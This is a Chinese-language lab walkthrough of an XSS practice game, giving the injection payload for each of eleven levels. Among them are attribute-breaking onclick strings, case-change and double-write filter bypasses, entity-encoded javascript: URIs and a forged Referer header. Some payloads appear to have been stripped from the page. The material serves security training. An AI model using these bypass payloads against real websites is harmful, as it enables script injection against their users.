漏洞复现篇——XSS靶场小游戏

环境安装:

  • PHPstudy
  • xss闯关小游戏
  • 火狐浏览器

把安装包解压到www目录下即可

开始闯关:

游戏开始页面,点击图片进入第一关

漏洞复现篇——XSS靶场小游戏_第1张图片

level1——

这一关将test改成即可

漏洞复现篇——XSS靶场小游戏_第2张图片
通关页面
漏洞复现篇——XSS靶场小游戏_第3张图片

level2——"οnclick="alert(/xxx/)

这一关要查看源代码

漏洞复现篇——XSS靶场小游戏_第4张图片
找到test的位置,发现第二处有突破口
漏洞复现篇——XSS靶场小游戏_第5张图片
输入"onclick="alert(/xxx/)然后点击页面即可

漏洞复现篇——XSS靶场小游戏_第6张图片

level3——'οnclick='alert(/xxx/)

这一关把双引号改成了单引号所以输入'onclick='alert(/xxx/)即可

漏洞复现篇——XSS靶场小游戏_第7张图片

level4——"οnclick="alert(/xxx/)

这一关与第二关一样"onclick="alert(/xxx/)
漏洞复现篇——XSS靶场小游戏_第8张图片

level5——">

用a标签如:">
漏洞复现篇——XSS靶场小游戏_第9张图片

level6——"Onclick="alert(1)

将O大写即可绕过如:"Onclick="alert(1)
漏洞复现篇——XSS靶场小游戏_第10张图片

level7——"oonnclick="alert(1)

用双写绕过,如:"oonnclick="alert(1)
漏洞复现篇——XSS靶场小游戏_第11张图片

level8——javascript:alert(1)

javascript:alert(1)进行实体编码绕过,如:javascript:alert(1)
漏洞复现篇——XSS靶场小游戏_第12张图片

level9——javascr ipt:alert(1)//http://

这里限制了网址格式并且过滤了script,所以要伪装一下,如:javascr ipt:alert(1)//http://

漏洞复现篇——XSS靶场小游戏_第13张图片

level10——!&t_sort=" type=“text” οnclick="alert(1)

自己添加一个弹框,如:!&t_sort=" type="text" onclick="alert(1)
漏洞复现篇——XSS靶场小游戏_第14张图片

level11——

页面没有突破口,先看源码吧,发现什么了么?都有隐藏属性,但是ref好像是Referer
漏洞复现篇——XSS靶场小游戏_第15张图片
那我们来抓包看看,发现没有Referer字段,那我们就添加一个
漏洞复现篇——XSS靶场小游戏_第16张图片

你可能感兴趣的:(渗透测试)